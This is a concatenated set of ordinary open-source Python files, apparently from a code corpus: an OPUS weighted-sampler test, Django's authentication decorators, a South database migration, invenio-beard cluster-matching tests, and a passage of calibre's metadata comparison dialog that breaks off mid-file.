sampled_index = index2[sampled_index]
is_chosen_choice = zeros(sampled_index.shape, dtype="bool")
#chosen_choice = -1 * ones(chosen_choice_index.size, dtype="int32")
if include_chosen_choice:
sampled_index = column_stack((chosen_choice_index[:,newaxis],sampled_index))
is_chosen_choice = zeros(sampled_index.shape, dtype="bool")
is_chosen_choice[chosen_choice_index!=UNPLACED_ID, 0] = 1
#chosen_choice[where(is_chosen_choice)[0]] = where(is_chosen_choice)[1]
## this is necessary because prob is indexed to index2, not to the choice set (as is chosen_choice_index)
sampling_prob_for_chosen_choices = take(prob, chosen_choice_index_to_index2[:, newaxis])
## if chosen choice chosen equals unplaced_id then the sampling prob is 0
sampling_prob_for_chosen_choices[where(chosen_choice_index==UNPLACED_ID)[0],] = 0.0
sampling_prob = column_stack([sampling_prob_for_chosen_choices, sampling_prob])
interaction_dataset = self.create_interaction_dataset(dataset1, dataset2, index1, sampled_index)
interaction_dataset.add_attribute(sampling_prob, '__sampling_probability')
interaction_dataset.add_attribute(is_chosen_choice, 'chosen_choice')
## to get the older returns
#sampled_index = interaction_dataset.get_2d_index()
#chosen_choices = UNPLACED_ID * ones(index1.size, dtype="int32")
#where_chosen = where(interaction_dataset.get_attribute("chosen_choice"))
#chosen_choices[where_chosen[0]]=where_chosen[1]
#return (sampled_index, chosen_choice)
return interaction_dataset
from opus_core.tests import opus_unittest
from numpy import array, all, alltrue, not_equal, equal, repeat, int32, where
from opus_core.datasets.dataset import Dataset
from opus_core.storage_factory import StorageFactory
class Test(opus_unittest.OpusTestCase):
def setUp(self):
storage = StorageFactory().get_storage('dict_storage')
storage.write_table(table_name='households',
table_data={
'household_id': arange(10)+1,
'grid_id': arange(-1, 9, 1)+1,
'lucky':array([1,0,1, 0,1,1, 1,1,0, 0])
}
)
storage.write_table(table_name='gridcells',
table_data={
'grid_id': arange(15)+1,
'filter':array([0,1,1, 1,1,1, 1,1,1, 0,1,0, 1,1,1]),
'weight':array([0.1,9,15, 2,5,1, 6,2.1,.3, 4,3,1, 10,8,7])
}
)
#create households
self.households = Dataset(in_storage=storage, in_table_name='households', id_name="household_id", dataset_name="household")
# create gridcells
self.gridcells = Dataset(in_storage=storage, in_table_name='gridcells', id_name="grid_id", dataset_name="gridcell")
def test_1d_weight_array(self):
""""""
sample_size = 5
# check the individual gridcells
# This is a stochastic model, so it may legitimately fail occassionally.
index1 = where(self.households.get_attribute("lucky"))[0]
index2 = where(self.gridcells.get_attribute("filter"))[0]
weight=self.gridcells.get_attribute("weight")
for icc in [0,1]: #include_chosen_choice?
#icc = sample([0,1],1)
sampler_ret = weighted_sampler().run(dataset1=self.households, dataset2=self.gridcells, index1=index1,
index2=index2, sample_size=sample_size, weight="weight",include_chosen_choice=icc)
# get results
sampled_index = sampler_ret.get_2d_index()
chosen_choices = UNPLACED_ID * ones(index1.size, dtype="int32")
where_chosen = where(sampler_ret.get_attribute("chosen_choice"))
chosen_choices[where_chosen[0]]=where_chosen[1]
sample_results = sampled_index, chosen_choices
sampled_index = sample_results[0]
self.assertEqual(sampled_index.shape, (index1.size, sample_size))
if icc:
placed_agents_index = self.gridcells.try_get_id_index(
self.households.get_attribute("grid_id")[index1],UNPLACED_ID)
chosen_choice_index = resize(array([UNPLACED_ID], dtype="int32"), index1.shape)
w = where(chosen_choices>=0)[0]
# for 64 bit machines, need to coerce the type to int32 -- on a
# 32 bit machine the astype(int32) doesn't do anything
chosen_choice_index[w] = sampled_index[w, chosen_choices[w]].astype(int32)
self.assert_( alltrue(equal(placed_agents_index, chosen_choice_index)) )
sampled_index = sampled_index[:,1:]
self.assert_( alltrue(lookup(sampled_index.ravel(), index2, index_if_not_found=UNPLACED_ID)!=UNPLACED_ID) )
self.assert_( all(not_equal(weight[sampled_index], 0.0)) )
def test_2d_weight_array(self):
#2d weight
sample_size = 5
n = self.households.size()
index1 = where(self.households.get_attribute("lucky"))[0]
index2 = where(self.gridcells.get_attribute("filter"))[0]
lucky = self.households.get_attribute("lucky")
weight = repeat(self.gridcells.get_attribute("weight")[newaxis, :], n, axis=0)
for i in range(n):
weight[i,:] += lucky[i]
for icc in [0,1]:
sampler_ret = weighted_sampler().run(dataset1=self.households, dataset2=self.gridcells, index1=index1,
index2=index2, sample_size=sample_size, weight=weight,include_chosen_choice=icc)
sampled_index = sampler_ret.get_2d_index()
chosen_choices = UNPLACED_ID * ones(index1.size, dtype="int32")
where_chosen = where(sampler_ret.get_attribute("chosen_choice"))
chosen_choices[where_chosen[0]]=where_chosen[1]
self.assertEqual(sampled_index.shape, (index1.size, sample_size))
if icc:
placed_agents_index = self.gridcells.try_get_id_index(
self.households.get_attribute("grid_id")[index1],UNPLACED_ID)
chosen_choice_index = resize(array([UNPLACED_ID], dtype="int32"), index1.shape)
w = where(chosen_choices>=0)[0]
chosen_choice_index[w] = sampled_index[w, chosen_choices[w]].astype(int32)
self.assert_( alltrue(equal(placed_agents_index, chosen_choice_index)) )
sampled_index = sampled_index[:,1:]
self.assert_( alltrue(lookup(sampled_index.ravel(), index2, index_if_not_found=UNPLACED_ID)!=UNPLACED_ID) )
for j in range(sample_size):
self.assert_( all(not_equal(weight[j, sampled_index[j,:]], 0.0)) )
if __name__ == "__main__":
opus_unittest.main()
| gpl-2.0 |
ojengwa/talk | venv/lib/python2.7/site-packages/django/contrib/auth/decorators.py | 38 | 3020 | from functools import wraps
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.utils.decorators import available_attrs
from django.utils.six.moves.urllib.parse import urlparse
from django.shortcuts import resolve_url
def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
path = request.build_absolute_uri()
resolved_login_url = resolve_url(login_url or settings.LOGIN_URL)
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
login_scheme, login_netloc = urlparse(resolved_login_url)[:2]
current_scheme, current_netloc = urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
path, resolved_login_url, redirect_field_name)
return _wrapped_view
return decorator
def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated(),
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def permission_required(perm, login_url=None, raise_exception=False):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
If the raise_exception parameter is given the PermissionDenied exception
is raised.
"""
def check_perms(user):
if not isinstance(perm, (list, tuple)):
perms = (perm, )
else:
perms = perm
# First check if the user has the permission (even anon users)
if user.has_perms(perms):
return True
# In case the 403 handler should be called raise the exception
if raise_exception:
raise PermissionDenied
# As the last resort, show the login form
return False
return user_passes_test(check_perms, login_url=login_url)
| mit |
atiberghien/makerscience-server | makerscience_profile/migrations/0002_auto__add_field_makerscienceprofile_activity__add_field_makersciencepr.py | 1 | 6258 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'MakerScienceProfile.activity'
db.add_column(u'makerscience_profile_makerscienceprofile', 'activity',
self.gf('django.db.models.fields.CharField')(default='', max_length=255),
keep_default=False)
# Adding field 'MakerScienceProfile.location'
db.add_column(u'makerscience_profile_makerscienceprofile', 'location',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['scout.PostalAddress'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'MakerScienceProfile.activity'
db.delete_column(u'makerscience_profile_makerscienceprofile', 'activity')
# Deleting field 'MakerScienceProfile.location'
db.delete_column(u'makerscience_profile_makerscienceprofile', 'location_id')
models = {
u'accounts.profile': {
'Meta': {'object_name': 'Profile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'makerscience_profile.makerscienceprofile': {
'Meta': {'object_name': 'MakerScienceProfile'},
'activity': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['scout.PostalAddress']", 'null': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.Profile']"})
},
u'scout.postaladdress': {
'Meta': {'object_name': 'PostalAddress'},
'address_locality': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'address_region': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post_office_box_number': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'street_address': ('django.db.models.fields.TextField', [], {'null': 'True'})
}
}
complete_apps = ['makerscience_profile'] | agpl-3.0 |
inspirehep/invenio-beard | tests/test_matching.py | 1 | 5408 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Test the matching algorithm."""
import json
import os
import unittest
from invenio_beard.matching import match_clusters
current_dir = os.path.dirname(__file__)
class TestMatching(unittest.TestCase):
"""Test different clusters."""
def test_the_same_clusters(self):
"""Test if the two exact clusters will be matched."""
signatures_before = {1: ['A', 'B']}
signatures_after = {2: ['A', 'B']}
match = match_clusters(signatures_before, signatures_after)
self.assertEquals(match, ([(1, 2)], [], []))
def test_cluster_adding(self):
"""Test if the new cluster will be distinguished."""
partition_before = {}
partition_after = {1: ['A', 'B']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([], [1], []))
def test_cluster_removal(self):
"""Test if the removed cluster will be distinguished."""
partition_before = {1: ['A', 'B']}
partition_after = {}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([], [], [1]))
def test_complex_matching(self):
"""Test more complex clustering with no removal or adding."""
partition_before = {1: ['A', 'B'], 2: ['C', 'D', 'E']}
partition_after = {3: ['A', 'C', 'E'], 4: ['B', 'D']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(1, 4), (2, 3)], [], []))
def test_complex_adding(self):
"""Test more complex clustering with adding a new cluster."""
partition_before = {1: ['A', 'B', 'C']}
partition_after = {2: ['A', 'B'], 3: ['C']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(1, 2)], [3], []))
def test_complex_removal(self):
"""Test more complex clustering with removing a cluster."""
partition_before = {1: ['A', 'B'], 2: ['C']}
partition_after = {3: ['A', 'B', 'C']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(1, 3)], [], [2]))
def test_complex_subproblems(self):
"""Test the case, where there are at least two subproblems."""
partition_before = {1: ["A", "B", "C"],
2: ["D", "E"],
3: ["F"],
4: ["G"],
5: ["H"]}
partition_after = {6: ["A", "B"],
7: ["C", "D"],
8: ["E", "F"],
9: ["G"],
10: ["I"]}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(4, 9), (1, 6), (2, 7), (3, 8)], [10], [5]))
def test_wang_signtures(self):
"""Test the real output of Beard."""
with open(os.path.join(
current_dir, 'data/wang_clusters_1.json'), 'r') as file_before:
signatures_before = json.load(file_before)
match = match_clusters(signatures_before, signatures_before)
self.assertEquals(match, ([(u'158992', u'158992'),
(u'623639', u'623639'),
(u'623638', u'623638')], [], []))
def test_wang_signtures_mixed_up(self):
"""Test the real output of Beard."""
with open(os.path.join(
current_dir, 'data/wang_clusters_1.json'), 'r') as file_before:
signatures_before = json.load(file_before)
with open(os.path.join(
current_dir, 'data/wang_clusters_2.json'), 'r') as file_after:
signatures_after = json.load(file_after)
match = match_clusters(signatures_before, signatures_after)
self.assertEquals(match, ([(u'158992', u'158992'),
(u'623639', u'623639')],
[u'623638_to_add'], [u'623638']))
def test_almost_the_same_keys(self):
"""Test the case where the keys are the same after casting."""
partition_before = {1: ["A", "B", "C"],
"1": ["D", "E"]}
partition_after = {1: ["A", "B", "C"],
"1": ["D", "E"]}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([('1', '1'), (1, 1)], [], []))
| gpl-2.0 |
sharad/calibre | src/calibre/gui2/metadata/diff.py | 1 | 22039 | #!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
import os
from collections import OrderedDict, namedtuple
from functools import partial
from future_builtins import zip
from PyQt5.Qt import (
QDialog, QWidget, QGridLayout, QLineEdit, QLabel, QToolButton, QIcon,
QVBoxLayout, QDialogButtonBox, QApplication, pyqtSignal, QFont, QPixmap,
QSize, QPainter, Qt, QColor, QPen, QSizePolicy, QScrollArea, QFrame,
QKeySequence, QAction, QMenu)
from calibre import fit_image
from calibre.ebooks.metadata import title_sort, authors_to_sort_string
from calibre.gui2 import pixmap_to_data, gprefs
from calibre.gui2.comments_editor import Editor
from calibre.gui2.languages import LanguagesEdit as LE
from calibre.gui2.metadata.basic_widgets import PubdateEdit, RatingEdit
from calibre.ptempfile import PersistentTemporaryFile
from calibre.utils.date import UNDEFINED_DATE
Widgets = namedtuple('Widgets', 'new old label button')
# Widgets {{{
class LineEdit(QLineEdit):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
QLineEdit.__init__(self, parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
if not is_new:
self.setReadOnly(True)
self.textChanged.connect(self.changed)
@dynamic_property
def value(self):
def fget(self):
val = unicode(self.text()).strip()
ism = self.metadata['is_multiple']
if ism:
if not val:
val = []
else:
val = [x.strip() for x in val.split(ism['list_to_ui']) if x.strip()]
return val
def fset(self, val):
ism = self.metadata['is_multiple']
if ism:
if not val:
val = ''
else:
val = ism['list_to_ui'].join(val)
self.setText(val)
self.setCursorPosition(0)
return property(fget=fget, fset=fset)
def from_mi(self, mi):
val = mi.get(self.field, default='') or ''
self.value = val
def to_mi(self, mi):
val = self.value
mi.set(self.field, val)
if self.field == 'title':
mi.set('title_sort', title_sort(val, lang=mi.language))
elif self.field == 'authors':
mi.set('author_sort', authors_to_sort_string(val))
@dynamic_property
def current_val(self):
def fget(self):
return unicode(self.text())
def fset(self, val):
self.setText(val)
self.setCursorPosition(0)
return property(fget=fget, fset=fset)
@property
def is_blank(self):
val = self.current_val.strip()
if self.field in {'title', 'authors'}:
return val in {'', _('Unknown')}
return not val
def same_as(self, other):
return self.current_val == other.current_val
class LanguagesEdit(LE):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
LE.__init__(self, parent=parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.textChanged.connect(self.changed)
if not is_new:
self.lineEdit().setReadOnly(True)
@dynamic_property
def current_val(self):
def fget(self):
return self.lang_codes
def fset(self, val):
self.lang_codes = val
return property(fget=fget, fset=fset)
def from_mi(self, mi):
self.lang_codes = mi.languages
def to_mi(self, mi):
mi.languages = self.lang_codes
@property
def is_blank(self):
return not self.current_val
def same_as(self, other):
return self.current_val == other.current_val
class RatingsEdit(RatingEdit):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
RatingEdit.__init__(self, parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.valueChanged.connect(self.changed)
if not is_new:
self.setReadOnly(True)
def from_mi(self, mi):
val = (mi.get(self.field, default=0) or 0)/2
self.setValue(val)
def to_mi(self, mi):
mi.set(self.field, self.value() * 2)
@property
def is_blank(self):
return self.value() == 0
def same_as(self, other):
return self.current_val == other.current_val
class DateEdit(PubdateEdit):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
PubdateEdit.__init__(self, parent, create_clear_button=False)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.setDisplayFormat(extra)
self.dateTimeChanged.connect(self.changed)
if not is_new:
self.setReadOnly(True)
def from_mi(self, mi):
self.current_val = mi.get(self.field, default=None)
def to_mi(self, mi):
mi.set(self.field, self.current_val)
@property
def is_blank(self):
return self.current_val.year <= UNDEFINED_DATE.year
def same_as(self, other):
return self.text() == other.text()
class SeriesEdit(LineEdit):
def from_mi(self, mi):
series = mi.get(self.field, default='')
series_index = mi.get(self.field + '_index', default=1.0)
val = ''
if series:
val = '%s [%s]' % (series, mi.format_series_index(series_index))
self.setText(val)
self.setCursorPosition(0)
def to_mi(self, mi):
val = unicode(self.text()).strip()
try:
series_index = float(val.rpartition('[')[-1].rstrip(']').strip())
except:
series_index = 1.0
series = val.rpartition('[')[0].strip() or None
mi.set(self.field, series)
mi.set(self.field + '_index', series_index)
class IdentifiersEdit(LineEdit):
def from_mi(self, mi):
self.as_dict = mi.identifiers
def to_mi(self, mi):
mi.set_identifiers(self.as_dict)
@dynamic_property
def as_dict(self):
def fget(self):
parts = (x.strip() for x in self.current_val.split(',') if x.strip())
return {k:v for k, v in {x.partition(':')[0].strip():x.partition(':')[-1].strip() for x in parts}.iteritems() if k and v}
def fset(self, val):
val = ('%s:%s' % (k, v) for k, v in val.iteritems())
self.setText(', '.join(val))
self.setCursorPosition(0)
return property(fget=fget, fset=fset)
class CommentsEdit(Editor):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
Editor.__init__(self, parent, one_line_toolbar=False)
self.set_minimum_height_for_editor(150)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.hide_tabs()
if not is_new:
self.hide_toolbars()
self.set_readonly(True)
@dynamic_property
def current_val(self):
def fget(self):
return self.html
def fset(self, val):
self.html = val or ''
self.changed.emit()
return property(fget=fget, fset=fset)
def from_mi(self, mi):
val = mi.get(self.field, default='')
self.current_val = val
def to_mi(self, mi):
mi.set(self.field, self.current_val)
def sizeHint(self):
return QSize(450, 200)
@property
def is_blank(self):
return not self.current_val.strip()
def same_as(self, other):
return self.current_val == other.current_val
class CoverView(QWidget):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
QWidget.__init__(self, parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.pixmap = None
self.blank = QPixmap(I('blank.png'))
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.GrowFlag|QSizePolicy.ExpandFlag)
self.sizePolicy().setHeightForWidth(True)
@property
def is_blank(self):
return self.pixmap is None
@dynamic_property
def current_val(self):
def fget(self):
return self.pixmap
def fset(self, val):
self.pixmap = val
self.changed.emit()
self.update()
return property(fget=fget, fset=fset)
def from_mi(self, mi):
p = getattr(mi, 'cover', None)
if p and os.path.exists(p):
pmap = QPixmap()
with open(p, 'rb') as f:
pmap.loadFromData(f.read())
if not pmap.isNull():
self.pixmap = pmap
self.update()
self.changed.emit()
return
cd = getattr(mi, 'cover_data', (None, None))
if cd and cd[1]:
pmap = QPixmap()
pmap.loadFromData(cd[1])
if not pmap.isNull():
self.pixmap = pmap
self.update()
self.changed.emit()
return
self.pixmap = None
self.update()
self.changed.emit()
def to_mi(self, mi):
mi.cover, mi.cover_data = None, (None, None)
if self.pixmap is not None and not self.pixmap.isNull():
with PersistentTemporaryFile('.jpg') as pt:
pt.write(pixmap_to_data(self.pixmap))
mi.cover = pt.name
def same_as(self, other):
return self.current_val == other.current_val
def sizeHint(self):
return QSize(225, 300)
def paintEvent(self, event):
pmap = self.blank if self.pixmap is None or self.pixmap.isNull() else self.pixmap
target = self.rect()
scaled, width, height = fit_image(pmap.width(), pmap.height(), target.width(), target.height())
target.setRect(target.x(), target.y(), width, height)
p = QPainter(self)
p.setRenderHints(QPainter.Antialiasing | QPainter.SmoothPixmapTransform)
p.drawPixmap(target, pmap)
if self.pixmap is not None and not self.pixmap.isNull():
sztgt = target.adjusted(0, 0, 0, -4)
f = p.font()
f.setBold(True)
p.setFont(f)
sz = u'\u00a0%d x %d\u00a0'%(self.pixmap.width(), self.pixmap.height())
flags = Qt.AlignBottom|Qt.AlignRight|Qt.TextSingleLine
szrect = p.boundingRect(sztgt, flags, sz)
p.fillRect(szrect.adjusted(0, 0, 0, 4), QColor(0, 0, 0, 200))
p.setPen(QPen(QColor(255,255,255)))
p.drawText(sztgt, flags, sz)
p.end()
# }}}
class CompareSingle(QWidget):
def __init__(
self, field_metadata, parent=None, revert_tooltip=None,
datetime_fmt='MMMM yyyy', blank_as_equal=True,
fields=('title', 'authors', 'series', 'tags', 'rating', 'publisher', 'pubdate', 'identifiers', 'languages', 'comments', 'cover')):
QWidget.__init__(self, parent)
self.l = l = QGridLayout()
l.setContentsMargins(0, 0, 0, 0)
self.setLayout(l)
revert_tooltip = revert_tooltip or _('Revert %s')
self.current_mi = None
self.changed_font = QFont(QApplication.font())
self.changed_font.setBold(True)
self.changed_font.setItalic(True)
self.blank_as_equal = blank_as_equal
self.widgets = OrderedDict()
row = 0
for field in fields:
m = field_metadata[field]
dt = m['datatype']
extra = None
if 'series' in {field, dt}:
cls = SeriesEdit
elif field == 'identifiers':
cls = IdentifiersEdit
elif field == 'languages':
cls = LanguagesEdit
elif 'comments' in {field, dt}:
cls = CommentsEdit
elif 'rating' in {field, dt}:
cls = RatingsEdit
elif dt == 'datetime':
extra = datetime_fmt
cls = DateEdit
elif field == 'cover':
cls = CoverView
elif dt in {'text', 'enum'}:
cls = LineEdit
else:
continue
neww = cls(field, True, self, m, extra)
neww.changed.connect(partial(self.changed, field))
oldw = cls(field, False, self, m, extra)
newl = QLabel('&%s:' % m['name'])
newl.setBuddy(neww)
button = QToolButton(self)
button.setIcon(QIcon(I('back.png')))
button.clicked.connect(partial(self.revert, field))
button.setToolTip(revert_tooltip % m['name'])
if field == 'identifiers':
button.m = m = QMenu(button)
button.setMenu(m)
button.setPopupMode(QToolButton.DelayedPopup)
m.addAction(button.toolTip()).triggered.connect(button.click)
m.actions()[0].setIcon(button.icon())
m.addAction(_('Merge identifiers')).triggered.connect(self.merge_identifiers)
m.actions()[1].setIcon(QIcon(I('merge.png')))
elif field == 'tags':
button.m = m = QMenu(button)
button.setMenu(m)
button.setPopupMode(QToolButton.DelayedPopup)
m.addAction(button.toolTip()).triggered.connect(button.click)
m.actions()[0].setIcon(button.icon())
m.addAction(_('Merge tags')).triggered.connect(self.merge_tags)
m.actions()[1].setIcon(QIcon(I('merge.png')))
self.widgets[field] = Widgets(neww, oldw, newl, button)
for i, w in enumerate((newl, neww, button, oldw)):
c = i if i < 2 else i + 1
if w is oldw:
c += 1
l.addWidget(w, row, c)
row += 1
self.sep = f = QFrame(self)
f.setFrameShape(f.VLine)
l.addWidget(f, 0, 2, row, 1)
self.sep2 = f = QFrame(self)
f.setFrameShape(f.VLine)
l.addWidget(f, 0, 4, row, 1)
if 'comments' in self.widgets and not gprefs.get('diff_widget_show_comments_controls', True):
self.widgets['comments'].new.hide_toolbars()
def save_comments_controls_state(self):
if 'comments' in self.widgets:
vis = self.widgets['comments'].new.toolbars_visible
if vis != gprefs.get('diff_widget_show_comments_controls', True):
gprefs.set('diff_widget_show_comments_controls', vis)
def changed(self, field):
w = self.widgets[field]
if not w.new.same_as(w.old) and (not self.blank_as_equal or not w.new.is_blank):
w.label.setFont(self.changed_font)
else:
w.label.setFont(QApplication.font())
def revert(self, field):
widgets = self.widgets[field]
neww, oldw = widgets[:2]
neww.current_val = oldw.current_val
def merge_identifiers(self):
widgets = self.widgets['identifiers']
neww, oldw = widgets[:2]
val = neww.as_dict
val.update(oldw.as_dict)
neww.as_dict = val
def merge_tags(self):
widgets = self.widgets['tags']
neww, oldw = widgets[:2]
val = oldw.value
lval = {icu_lower(x) for x in val}
extra = [x for x in neww.value if icu_lower(x) not in lval]
if extra:
neww.value = val + extra
def __call__(self, oldmi, newmi):
self.current_mi = newmi
self.initial_vals = {}
for field, widgets in self.widgets.iteritems():
widgets.old.from_mi(oldmi)
widgets.new.from_mi(newmi)
self.initial_vals[field] = widgets.new.current_val
def apply_changes(self):
changed = False
for field, widgets in self.widgets.iteritems():
val = widgets.new.current_val
if val != self.initial_vals[field]:
widgets.new.to_mi(self.current_mi)
changed = True
return changed
class CompareMany(QDialog):
def __init__(self, ids, get_metadata, field_metadata, parent=None,
window_title=None,
reject_button_tooltip=None,
accept_all_tooltip=None,
reject_all_tooltip=None,
revert_tooltip=None,
intro_msg=None,
action_button=None,
**kwargs):
QDialog.__init__(self, parent)
self.l = l = QVBoxLayout()
self.setLayout(l)
self.setWindowIcon(QIcon(I('auto_author_sort.png')))
self.get_metadata = get_metadata
self.ids = list(ids)
self.total = len(self.ids)
self.accepted = OrderedDict()
self.window_title = window_title or _('Compare metadata')
if intro_msg:
self.la = la = QLabel(intro_msg)
la.setWordWrap(True)
l.addWidget(la)
self.compare_widget = CompareSingle(field_metadata, parent=parent, revert_tooltip=revert_tooltip, **kwargs)
self.sa = sa = QScrollArea()
l.addWidget(sa)
sa.setWidget(self.compare_widget)
sa.setWidgetResizable(True)
self.bb = bb = QDialogButtonBox(QDialogButtonBox.Cancel)
bb.rejected.connect(self.reject)
if self.total > 1:
self.aarb = b = bb.addButton(_('&Accept all remaining'), bb.YesRole)
b.setIcon(QIcon(I('ok.png')))
if accept_all_tooltip:
b.setToolTip(accept_all_tooltip)
b.clicked.connect(self.accept_all_remaining)
self.rarb = b = bb.addButton(_('Re&ject all remaining'), bb.NoRole)
b.setIcon(QIcon(I('minus.png')))
if reject_all_tooltip:
b.setToolTip(reject_all_tooltip)
b.clicked.connect(self.reject_all_remaining)
self.sb = b = bb.addButton(_('&Reject'), bb.ActionRole)
b.clicked.connect(partial(self.next_item, False))
b.setIcon(QIcon(I('minus.png')))
if reject_button_tooltip:
b.setToolTip(reject_button_tooltip)
self.next_action = ac = QAction(self)
ac.setShortcut(QKeySequence(Qt.ALT | Qt.Key_Right))
self.addAction(ac)
if action_button is not None:
self.acb = b = bb.addButton(action_button[0], bb.ActionRole)
